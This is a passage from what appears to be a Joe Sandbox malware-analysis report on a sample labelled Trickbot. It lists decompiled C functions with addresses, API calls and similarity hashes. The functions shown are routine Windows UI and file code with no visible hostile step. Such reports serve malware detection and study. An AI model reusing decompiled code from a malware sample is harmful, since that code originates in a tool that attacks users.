					_t68 = MulDiv(_a12,  *_t111, _t111[1]);
					_t107 =  *((intOrPtr*)(_t114 + 0x90));
					_a8 = _a8 +  *_t107;
					_t69 = _t68 +  *((intOrPtr*)(_t107 + 4));
					__eflags = _t69;
					_push(_t69);
					_push(_a8);
					return E0041FFD7(_t114,  *((intOrPtr*)(_t107 + 4)));
				}
				 *(__ecx + 0xf8) =  *(__ecx + 0xe8);
				ShowScrollBar( *(__ecx + 0x1c), 0, 0);
				_t75 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + 0x114)))) + 0x5c));
				_t94 =  *((intOrPtr*)(_t75 + 0x1e));
				if(_t94 >= 0x8000) {
					L3:
					_a4 = 0;
					L4:
					ShowScrollBar( *(_t114 + 0x1c), 1, _a4);
					if(_a4 != 0) {
						_t78 =  *((intOrPtr*)(_t114 + 0x114));
						_v28 = 3;
						_t113 = 1;
						_v24 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1c) & 0x0000ffff;
						_v20 =  *( *((intOrPtr*)( *_t78 + 0x5c)) + 0x1e) & 0x0000ffff;
						_v16 = _t113;
						if(E0041A10F(_t114, _t113,  &_v32, 0) == 0) {
							E0041A069(_t114, _t113, _v24, _v20, 0);
						}
					}
					return E00434FEB(_t114,  *((intOrPtr*)(_t114 + 0xf4)), 1);
				}
				_a4 = 1;
				if((_t94 & 0x0000ffff) - ( *(_t75 + 0x1c) & 0x0000ffff) <= 0x7fff) {
					goto L4;
				}
				goto L3;
			}

0x00434e84
0x00434e8f
0x00434f4d
0x00434f50
0x00434f56
0x00434f64
0x00434f6b
0x00434f72
0x00434f75
0x00434f7f
0x00434f86
0x00434f94
0x00434f9c
0x00434fa1
0x00434fb1
0x00434fbf
0x00434fc7
0x00434fc9
0x00434fd1
0x00434fd9
0x00434fd9
0x00434fdb
0x00434fdc
0x00000000
0x00434fdf
0x00434ea6
0x00434eac
0x00434eb6
0x00434eb9
0x00434ec2
0x00434edc
0x00434edc
0x00434edf
0x00434ee7
0x00434eec
0x00434eee
0x00434ef4
0x00434eff
0x00434f08
0x00434f16
0x00434f1e
0x00434f28
0x00434f34
0x00434f34
0x00434f28
0x00000000
0x00434f43
0x00434ecd
0x00434eda
0x00000000
0x00000000
0x00000000

APIs

ShowScrollBar.USER32(?,00000000,00000000), ref: 00434EAC
ShowScrollBar.USER32(?,00000001,?), ref: 00434EE7
MulDiv.KERNEL32(?,?,?), ref: 00434FBA
MulDiv.KERNEL32(?,?,?), ref: 00434FC7

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: ScrollShow
String ID:
API String ID: 3611344627-0
Opcode ID: 42d629f387b1b796f16a0c094c391571b08cee01f6f670d00fc2c33f12f4ac6d
Instruction ID: 4d6583212506bd3c30a9fcfeae041dba725c3e829584cf0c149fccc3b8ff861a
Opcode Fuzzy Hash: 42d629f387b1b796f16a0c094c391571b08cee01f6f670d00fc2c33f12f4ac6d
Instruction Fuzzy Hash: 89414774600605AFCB14DF59C880EAABBF5FF88308F10852EE91A9B361D774E851DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00428953, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 114
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428953(intOrPtr* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __ebp;
				signed int _t20;
				void* _t22;
				signed int _t24;
				CHAR* _t25;
				signed int _t29;
				void* _t30;
				signed int _t32;
				CHAR* _t33;
				signed int _t36;
				intOrPtr* _t37;
				char _t40;
				signed char _t42;
				signed int _t44;
				CHAR* _t45;
				signed int _t48;
				void* _t50;

				_t48 = _a8;
				_t36 = 0;
				_t44 = _t48;
				if( *_t48 == 0) {
					L17:
					_t37 = _a4;
					_t45 = E004181F7(_t37, _t50, _t36);
					while( *_t48 != 0) {
						_t40 =  *_t48;
						if(_t40 != 0x25) {
							L31:
							_t20 = _t40 & 0x000000ff;
							__eflags =  *(_t20 + 0x44d1e1) & 0x00000004;
							if(( *(_t20 + 0x44d1e1) & 0x00000004) != 0) {
								 *_t45 = _t40;
								_t45 =  &(_t45[1]);
								_t48 = _t48 + 1;
								__eflags = _t48;
							}
							 *_t45 =  *_t48;
							_t45 =  &(_t45[1]);
							_t48 = _t48 + 1;
							continue;
						}
						_t22 =  *(_t48 + 1);
						if(_t22 < 0x30 || _t22 > 0x39) {
							if(_t22 < 0x41 || _t22 > 0x5a) {
								goto L31;
							} else {
								if(_t22 <= 0x39) {
									goto L26;
								}
								_t24 = _t22 - 0x38;
								goto L27;
							}
						} else {
							L26:
							_t24 = _t22 - 0x31;
							__eflags = _t24;
							L27:
							_t48 = _t48 + 2;
							if(_t24 < _a16) {
								_t25 =  *(_a12 + _t24 * 4);
								__eflags = _t25;
								if(_t25 != 0) {
									lstrcpyA(_t45, _t25);
									_t45 =  &(_t45[lstrlenA(_t45)]);
								}
							} else {
								 *_t45 = 0x3f;
								_t45 =  &(_t45[1]);
							}
							continue;
						}
					}
					__eflags = _t45 -  *_t37;
					return E00418246(_t37, _t45 -  *_t37, _t45 -  *_t37);
				} else {
					goto L1;
				}
				do {
					L1:
					_t42 =  *_t44;
					if(_t42 != 0x25) {
						L12:
						_t29 = _t42 & 0x000000ff;
						__eflags =  *(_t29 + 0x44d1e1) & 0x00000004;
						if(( *(_t29 + 0x44d1e1) & 0x00000004) != 0) {
							_t36 = _t36 + 1;
							_t44 = _t44 + 1;
							__eflags = _t44;
						}
						_t44 = _t44 + 1;
						__eflags = _t44;
						L15:
						_t36 = _t36 + 1;
						__eflags = _t36;
						goto L16;
					}
					_t30 =  *(_t44 + 1);
					if(_t30 < 0x30 || _t30 > 0x39) {
						if(_t30 < 0x41 || _t30 > 0x5a) {
							goto L12;
						} else {
							if(_t30 <= 0x39) {
								goto L8;
							} else {
								_t32 = _t30 - 0x38;
								goto L9;
							}
						}
					} else {
						L8:
						_t32 = _t30 - 0x31;
						__eflags = _t32;
						L9:
						_t44 = _t44 + 2;
						if(_t32 >= _a16) {
							goto L15;
						} else {
							_t33 =  *(_a12 + _t32 * 4);
							if(_t33 != 0) {
								_t36 = _t36 + lstrlenA(_t33);
							}
							goto L16;
						}
					}
					L16:
				} while ( *_t44 != 0);
				goto L17;
			}

0x00428958
0x0042895b
0x0042895e
0x00428962
0x004289c1
0x004289c2
0x004289cc
0x004289ce
0x004289d3
0x004289d8
0x00428a29
0x00428a29
0x00428a2c
0x00428a33
0x00428a35
0x00428a37
0x00428a38
0x00428a38
0x00428a38
0x00428a3b
0x00428a3d
0x00428a3e
0x00000000
0x00428a3e
0x004289da
0x004289df
0x004289e7
0x00000000
0x004289ed
0x004289ef
0x00000000
0x00000000
0x004289f4
0x00000000
0x004289f4
0x004289f9
0x004289f9
0x004289fc
0x004289fc
0x004289ff
0x00428a00
0x00428a04
0x00428a0f
0x00428a12
0x00428a14
0x00428a18
0x00428a25
0x00428a25
0x00428a06
0x00428a06
0x00428a09
0x00428a09
0x00000000
0x00428a04
0x004289df
0x00428a41
0x00428a4f
0x00000000
0x00000000
0x00000000
0x00428964
0x00428964
0x00428964
0x00428969
0x004289ac
0x004289ac
0x004289af
0x004289b6
0x004289b8
0x004289b9
0x004289b9
0x004289b9
0x004289ba
0x004289ba
0x004289bb
0x004289bb
0x004289bb
0x00000000
0x004289bb
0x0042896b
0x00428970
0x00428978
0x00000000
0x0042897e
0x00428980
0x00000000
0x00428982
0x00428985
0x00000000
0x00428985
0x00428980
0x0042898a
0x0042898a
0x0042898d
0x0042898d
0x00428990
0x00428991
0x00428995
0x00000000
0x00428997
0x0042899a
0x0042899f
0x004289a8
0x004289a8
0x00000000
0x0042899f
0x00428995
0x004289bc
0x004289bc
0x00000000

APIs

lstrlenA.KERNEL32(?,?,75B83F17,?,\2B,0042894F,?,?,?,\2B,?,?,00000100), ref: 004289A2
lstrcpyA.KERNEL32(00000001,?,00000000,?,75B83F17,?,\2B,0042894F,?,?,?,\2B,?,?,00000100), ref: 00428A18
lstrlenA.KERNEL32(00000001,?,\2B,0042894F,?,?,?,\2B,?,?,00000100), ref: 00428A1F

Strings

\2B, xrefs: 00428953

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: lstrlen$lstrcpy
String ID: \2B
API String ID: 805584807-4014307851
Opcode ID: c3cbc62e1abbadd03b5ddcb83fd82b2c2d62b62b5a175c7eecdc5ca825cbabdd
Instruction ID: 3fea42ffe612ded21c97fb7ec65676f4904e051064c047fd2abf392999a505e0
Opcode Fuzzy Hash: c3cbc62e1abbadd03b5ddcb83fd82b2c2d62b62b5a175c7eecdc5ca825cbabdd
Instruction Fuzzy Hash: 4E31C7A030A1B64AE7218E29A84477E7BD9AB56354FD4249FD4C2C6247CE6C8CD3831F

Uniqueness

Uniqueness Score: -1.00%

Function 0042A6F8, Relevance: 6.1, APIs: 4, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0042A6F8(void* __ecx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				void* __ebp;
				intOrPtr _t56;
				signed char _t60;
				signed char _t65;
				intOrPtr _t67;
				signed int _t73;
				void* _t76;
				intOrPtr _t84;
				intOrPtr _t95;

				_t56 = 1;
				_t76 = __ecx;
				_v24 = _t56;
				_v20 = _t56;
				_push(GetStockObject(0));
				_t84 = E00421789();
				_v16 = _t84;
				_v8 = E0042C740(__eflags);
				_t60 =  *(_t76 + 0x74);
				_v12 = _t84;
				if((0x0000a000 & _t60) == 0) {
					__eflags = _t60 & 0x00000050;
					if(__eflags == 0) {
						_v24 = GetSystemMetrics(0x20) - 1;
						_v20 = GetSystemMetrics(0x21) - 1;
						_t65 =  *(_t76 + 0x78);
						__eflags = 0x0000a000 & _t65;
						if((0x0000a000 & _t65) == 0) {
							L7:
							__eflags = _t65 & 0x00000050;
							if(__eflags == 0) {
								L10:
							} else {
								__eflags =  *(_t76 + 0x7c);
								if(__eflags == 0) {
									goto L10;
								} else {
									goto L9;
								}
							}
						} else {
							__eflags =  *(_t76 + 0x7c);
							if(__eflags != 0) {
								goto L7;
							}
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v12 = _v8;
					} else {
						goto L2;
					}
				} else {
					L2:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if(_a4 != 0) {
					_v20 = 0;
					_v24 = 0;
				}
				_t95 =  *0x44b354; // 0x1
				if(_t95 != 0 && ( *(_t76 + 0x75) & 0x000000f0) != 0) {
					InflateRect( &_v40, 0xffffffff, 0xffffffff);
				}
				_t97 =  *(_t76 + 0x24);
				_t67 = _v8;
				if( *(_t76 + 0x24) == 0) {
					_t67 = _v16;
				}
				E0042C7B3( *((intOrPtr*)(_t76 + 0x84)), _t97,  &_v40, _v24, _v20, _t76 + 0xc,  *((intOrPtr*)(_t76 + 0x1c)),  *((intOrPtr*)(_t76 + 0x20)), _v12, _t67);
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x1c)) = _v24;
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)(_t76 + 0x20)) = _v20;
				asm("movsd");
				_t73 = 0 | _v12 == _v8;
				 *(_t76 + 0x24) = _t73;
				return _t73;
			}

0x0042a703
0x0042a704
0x0042a708
0x0042a70b
0x0042a714
0x0042a71a
0x0042a71c
0x0042a724
0x0042a727
0x0042a72a
0x0042a734
0x0042a742
0x0042a745
0x0042a759
0x0042a75f
0x0042a762
0x0042a765
0x0042a767
0x0042a76f
0x0042a76f
0x0042a772
0x0042a77f
0x0042a774
0x0042a774
0x0042a778
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a778
0x0042a769
0x0042a769
0x0042a76d
0x00000000
0x00000000
0x0042a76d
0x0042a788
0x0042a789
0x0042a78a
0x0042a78b
0x0042a78c
0x0042a747
0x00000000
0x0042a747
0x0042a736
0x0042a739
0x0042a73c
0x0042a73d
0x0042a73e
0x0042a73f
0x0042a73f
0x0042a794
0x0042a796
0x0042a799
0x0042a799
0x0042a79c
0x0042a7a2
0x0042a7b2
0x0042a7b2
0x0042a7b8
0x0042a7bb
0x0042a7be
0x0042a7c0
0x0042a7c0
0x0042a7e1
0x0042a7ec
0x0042a7f0
0x0042a7f6
0x0042a7f7
0x0042a7f8
0x0042a800
0x0042a801
0x0042a805
0x0042a80b

APIs

GetStockObject.GDI32(00000000), ref: 0042A70E

Part of subcall function 0042C740: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0042A724), ref: 0042C77F
Part of subcall function 0042C740: CreatePatternBrush.GDI32(00000000), ref: 0042C78C
Part of subcall function 0042C740: DeleteObject.GDI32(00000000), ref: 0042C798

GetSystemMetrics.USER32(00000020), ref: 0042A754
GetSystemMetrics.USER32(00000021), ref: 0042A75C
InflateRect.USER32(?,000000FF,000000FF), ref: 0042A7B2

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: CreateMetricsObjectSystem$BitmapBrushDeleteInflatePatternRectStock
String ID:
API String ID: 419749085-0
Opcode ID: dbc3407a905d228c6a97d3ec7e34fbcb0fbce310845c8d38f148d1b052413c06
Instruction ID: 6708048f677f02915db4418b8f5470bb674ea32e0de7e6e0d0832b884b0f9e97
Opcode Fuzzy Hash: dbc3407a905d228c6a97d3ec7e34fbcb0fbce310845c8d38f148d1b052413c06
Instruction Fuzzy Hash: 5D417A71E002289FCF11CFA8D984A9EB7F5AF48310F5502A6ED10BB295D374AE41CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00436ABA, Relevance: 6.1, APIs: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00436ABA(void* __ecx) {
				INT* _t43;
				CHAR* _t44;
				CHAR* _t47;
				CHAR* _t65;
				void* _t76;
				void* _t81;
				void* _t83;

				E00405340(E00438638, _t81);
				_t43 =  *(_t81 + 0x20);
				_t65 = 0;
				 *((intOrPtr*)(_t81 - 0x10)) = _t83 - 0x20;
				_t76 = __ecx;
				 *(_t81 - 0x14) = 0;
				 *((intOrPtr*)(_t81 - 0x18)) = 0;
				if(_t43 != 0) {
					L4:
					_t44 = ExtTextOutA( *(_t76 + 4),  *(_t81 + 8),  *(_t81 + 0xc),  *(_t81 + 0x10),  *(_t81 + 0x14),  *(_t81 + 0x18),  *(_t81 + 0x1c), _t43);
					 *(_t81 + 0x18) = _t44;
					if( *((intOrPtr*)(_t81 - 0x18)) != 0 && _t44 != 0 && (GetTextAlign( *(_t76 + 8)) & 0x00000001) != 0) {
						GetCurrentPositionEx( *(_t76 + 4), _t81 - 0x20);
						E0042134C(_t76, _t81 - 0x28,  *(_t81 - 0x20) -  *((intOrPtr*)(_t81 - 0x18)),  *((intOrPtr*)(_t81 - 0x1c)));
					}
					E0041BE14( *(_t81 - 0x14));
					E0041BE14(_t65);
					_t47 =  *(_t81 + 0x18);
				} else {
					if( *(_t81 + 0x1c) != 0) {
						 *(_t81 - 4) = 0;
						 *(_t81 - 0x14) = E0041BDEB( *(_t81 + 0x1c) << 2);
						_t65 = E0041BDEB( *(_t81 + 0x1c));
						 *(_t81 - 4) =  *(_t81 - 4) | 0xffffffff;
						E0043682F(_t76, _t81 - 0x20, _t81 + 8,  *(_t81 + 0x18), _t81 + 0x1c, 0, 0, 0, 0, _t65,  *(_t81 - 0x14), _t81 - 0x18);
						_t43 =  *(_t81 - 0x14);
						 *(_t81 + 0x18) = _t65;
						goto L4;
					} else {
						_t47 = 1;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
				return _t47;
			}

0x00436abf
0x00436ac7
0x00436acf
0x00436ad3
0x00436ad6
0x00436ad8
0x00436adb
0x00436ade
0x00436b37
0x00436b4d
0x00436b56
0x00436b59
0x00436b73
0x00436b89
0x00436b89
0x00436b91
0x00436b97
0x00436b9c
0x00436ae0
0x00436ae3
0x00436af0
0x00436afd
0x00436b08
0x00436b0e
0x00436b2c
0x00436b31
0x00436b34
0x00000000
0x00436ae5
0x00436ae7
0x00436ae7
0x00436ae3
0x00436ba6
0x00436baf

APIs

__EH_prolog.LIBCMT ref: 00436ABF
ExtTextOutA.GDI32(?,?,?,?,?,?,?,?), ref: 00436B4D
GetTextAlign.GDI32(?), ref: 00436B62
GetCurrentPositionEx.GDI32(?,?), ref: 00436B73

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Text$AlignCurrentH_prologPosition
String ID:
API String ID: 2331262098-0
Opcode ID: abaa7a4edba41b073aae32f2fa436fc04e8b7b125ade37c73749b9c1282feb7e
Instruction ID: 799bce53b743fd2dc915e6c1cec41ffad6423c0c15fdffbac9ccb4330ddc6879
Opcode Fuzzy Hash: abaa7a4edba41b073aae32f2fa436fc04e8b7b125ade37c73749b9c1282feb7e
Instruction Fuzzy Hash: 9E31157290021AAFCF119F95DC86CEFBF79FB08350F10412AF915A2260C7399A61DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00428564, Relevance: 6.1, APIs: 4, Instructions: 87
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00428564(intOrPtr __ecx, void* __eflags, CHAR* _a4, int _a8, intOrPtr _a12) {
				struct HWND__* _v8;
				int _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				char _v280;
				struct HWND__* _t23;
				signed int _t32;
				intOrPtr _t34;
				long _t36;
				int _t38;
				intOrPtr _t41;
				CHAR* _t42;
				int _t43;
				long _t44;

				_t41 = __ecx;
				_v20 = __ecx;
				E00428536(0);
				_t23 = E004286DC(0,  &_v8);
				_t44 = 0;
				_v16 = _t23;
				if(_t23 == 0) {
					L3:
					if(_t41 != 0) {
						_t5 = _t41 + 0x9c; // 0x9c
						_t44 = _t5;
					}
					L5:
					_v12 = 0;
					if(_t44 != 0) {
						_v12 =  *_t44;
						_t34 = _a12;
						if(_t34 != 0) {
							 *_t44 = _t34 + 0x30000;
						}
					}
					_t38 = _a8;
					if((_t38 & 0x000000f0) == 0) {
						_t32 = _t38 & 0x0000000f;
						if(_t32 <= 1 || _t32 > 2 && _t32 <= 4) {
							_t38 = _t38 | 0x00000030;
						}
					}
					if(_t41 == 0) {
						_t42 =  &_v280;
						GetModuleFileNameA(0,  &_v280, 0x104);
					} else {
						_t42 =  *(_t41 + 0x78);
					}
					_t43 = MessageBoxA(_v16, _a4, _t42, _t38);
					if(_t44 != 0) {
						 *_t44 = _v12;
					}
					if(_v8 != 0) {
						EnableWindow(_v8, 1);
					}
					E00428536(1);
					return _t43;
				}
				_t36 = SendMessageA(_v8, 0x376, 0, 0);
				if(_t36 == 0) {
					goto L3;
				} else {
					_t44 = _t36;
					goto L5;
				}
			}

0x00428572
0x00428575
0x00428578
0x00428582
0x00428587
0x0042858b
0x0042858e
0x004285a8
0x004285aa
0x004285ac
0x004285ac
0x004285ac
0x004285b2
0x004285b4
0x004285b7
0x004285bb
0x004285be
0x004285c3
0x004285ca
0x004285ca
0x004285c3
0x004285cc
0x004285d2
0x004285d6
0x004285dc
0x004285e8
0x004285e8
0x004285dc
0x004285ed
0x00428602
0x00428608
0x004285ef
0x004285ef
0x004285ef
0x0042861e
0x00428620
0x00428625
0x00428625
0x0042862b
0x00428632
0x00428632
0x0042863d
0x00428648
0x00428648
0x0042859a
0x004285a2
0x00000000
0x004285a4
0x004285a4
0x00000000
0x004285a4

APIs

Part of subcall function 004286DC: GetParent.USER32(?), ref: 0042870F
Part of subcall function 004286DC: GetLastActivePopup.USER32(?), ref: 0042871E
Part of subcall function 004286DC: IsWindowEnabled.USER32(?), ref: 00428733
Part of subcall function 004286DC: EnableWindow.USER32(?,00000000), ref: 00428746

SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0042859A
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 00428608
MessageBoxA.USER32(00000000,?,?,00000000), ref: 00428616
EnableWindow.USER32(00000000,00000001), ref: 00428632

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
String ID:
API String ID: 1958756768-0
Opcode ID: 33d4c5790ab793b7e1332a0a122fb3979a15451c86d39661b82831e0f18052f1
Instruction ID: e4e31f2271d95948c812669bcdce70faf8dade0d8038f471dba2f2254b6d18f2
Opcode Fuzzy Hash: 33d4c5790ab793b7e1332a0a122fb3979a15451c86d39661b82831e0f18052f1
Instruction Fuzzy Hash: 4021B672B01129BFDB209F94ECC1AEEB7B9EB44345F94042EE605E3240CB799D80CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0041DF76, Relevance: 6.1, APIs: 4, Instructions: 85
stringtimeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041DF76(void* __ecx, char _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				void* _t29;
				void* _t30;
				long _t33;
				long _t34;
				intOrPtr _t43;
				signed int _t45;
				signed int _t46;
				void* _t54;
				CHAR* _t55;
				intOrPtr* _t56;

				_t56 = _a4;
				_t54 = __ecx;
				E00405360(_t56, 0, 0x118);
				_t2 = _t56 + 0x12; // 0x41df72
				lstrcpynA(_t2,  *(_t54 + 0xc), 0x104);
				_t29 =  *(_t54 + 4);
				_t46 = _t45 | 0xffffffff;
				if(_t29 == _t46) {
					L12:
					_t30 = 1;
					return _t30;
				}
				if(GetFileTime(_t29,  &_v12,  &_v20,  &_v28) == 0) {
					L3:
					return 0;
				}
				_t33 = GetFileSize( *(_t54 + 4), 0);
				 *(_t56 + 0xc) = _t33;
				if(_t33 != _t46) {
					_t55 =  *(_t54 + 0xc);
					if( *((intOrPtr*)(_t55 - 8)) != 0) {
						_t34 = GetFileAttributesA(_t55);
						if(_t34 == _t46) {
							goto L5;
						}
						 *(_t56 + 0x10) = _t34;
						L8:
						 *_t56 =  *((intOrPtr*)(E00416006( &_a4,  &_v12, _t46)));
						 *((intOrPtr*)(_t56 + 8)) =  *((intOrPtr*)(E00416006( &_a4,  &_v20, _t46)));
						_t43 =  *((intOrPtr*)(E00416006( &_a4,  &_v28, _t46)));
						 *((intOrPtr*)(_t56 + 4)) = _t43;
						if( *_t56 == 0) {
							 *_t56 = _t43;
						}
						if( *((intOrPtr*)(_t56 + 8)) == 0) {
							_t24 = _t56 + 4; // 0xfffef685
							 *((intOrPtr*)(_t56 + 8)) =  *_t24;
						}
						goto L12;
					}
					L5:
					 *(_t56 + 0x10) =  *(_t56 + 0x10) & 0x00000000;
					goto L8;
				}
				goto L3;
			}

0x0041df7e
0x0041df89
0x0041df8c
0x0041df94
0x0041dfa0
0x0041dfa6
0x0041dfa9
0x0041dfae
0x0041e046
0x0041e048
0x00000000
0x0041e048
0x0041dfc9
0x0041dfdd
0x00000000
0x0041dfdd
0x0041dfd0
0x0041dfd8
0x0041dfdb
0x0041dfe1
0x0041dfe8
0x0041dff1
0x0041dff9
0x00000000
0x00000000
0x0041dffb
0x0041dffe
0x0041e00e
0x0041e01f
0x0041e02e
0x0041e030
0x0041e036
0x0041e038
0x0041e038
0x0041e03e
0x0041e040
0x0041e043
0x0041e043
0x00000000
0x0041e03e
0x0041dfea
0x0041dfea
0x00000000
0x0041dfea
0x00000000

APIs

lstrcpynA.KERNEL32(0041DF72,?,00000104,?,?,?,?,?,?,?,0041DF60,?), ref: 0041DFA0
GetFileTime.KERNEL32(00000000,0041DF60,?,?,?,?,?,?,?,?,?,0041DF60,?), ref: 0041DFC1
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0041DF60,?), ref: 0041DFD0
GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,0041DF60,?), ref: 0041DFF1

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: File$AttributesSizeTimelstrcpyn
String ID:
API String ID: 1499663573-0
Opcode ID: f895dba28c62974e6f72f5cb6fa42da3f4edf7303b6851ab21f8776e8f1f4b1a
Instruction ID: 291008eaf6d4eed17b6ccbdf29df0a6571222242244954a0ad5250ebf2711d8c
Opcode Fuzzy Hash: f895dba28c62974e6f72f5cb6fa42da3f4edf7303b6851ab21f8776e8f1f4b1a
Instruction Fuzzy Hash: 823180B2500605AFC710DF61CC85EEBBBF8BB18310F10892EE552C7290E7B4A985CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0042E5EE, Relevance: 6.1, APIs: 4, Instructions: 74
stringCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E0042E5EE() {
				intOrPtr _t25;
				struct HWND__* _t26;
				struct HWND__* _t43;
				struct HWND__** _t50;
				void* _t52;

				E00405340(E00437FEC, _t52);
				_t25 =  *0x447478; // 0x44748c
				 *((intOrPtr*)(_t52 - 0x10)) = _t25;
				_t50 =  *(_t52 + 0xc);
				_t26 = _t50[2];
				_t43 = _t50[1];
				 *(_t52 - 4) = 0;
				if(_t26 != 0xfffffdf8 || (_t50[0x19] & 0x00000001) == 0) {
					if(_t26 == 0xfffffdee && (_t50[0x2d] & 0x00000001) != 0) {
						goto L4;
					}
				} else {
					L4:
					_t43 = GetDlgCtrlID(_t43) & 0x0000ffff;
				}
				if(_t43 == 0) {
					L8:
					_push(0x50);
					_push( *((intOrPtr*)(_t52 - 0x10)));
					_push( &(_t50[4]));
					if(_t50[2] != 0xfffffdf8) {
						E004182E9();
					} else {
						lstrcpynA();
					}
					 *((intOrPtr*)( *((intOrPtr*)(_t52 + 0x10)))) = 0;
					SetWindowPos( *_t50, 0, 0, 0, 0, 0, 0x213);
					_push(1);
					_pop(0);
				} else {
					if(E0041C702(_t43, _t52 - 0x110, 0x100) != 0) {
						E0041C729(_t52 - 0x10, _t52 - 0x110, 1, 0xa);
						goto L8;
					}
				}
				 *(_t52 - 4) =  *(_t52 - 4) | 0xffffffff;
				E00417EC8(_t52 - 0x10);
				 *[fs:0x0] =  *((intOrPtr*)(_t52 - 0xc));
				return 0;
			}

0x0042e5f3
0x0042e5fe
0x0042e606
0x0042e609
0x0042e613
0x0042e616
0x0042e61b
0x0042e61e
0x0042e62b
0x00000000
0x00000000
0x0042e636
0x0042e636
0x0042e63d
0x0042e63d
0x0042e642
0x0042e66e
0x0042e671
0x0042e673
0x0042e679
0x0042e67a
0x0042e684
0x0042e67c
0x0042e67c
0x0042e67c
0x0042e699
0x0042e69d
0x0042e6a3
0x0042e6a5
0x0042e644
0x0042e658
0x0042e669
0x00000000
0x0042e669
0x0042e658
0x0042e6a6
0x0042e6ad
0x0042e6ba
0x0042e6c2

APIs

__EH_prolog.LIBCMT ref: 0042E5F3
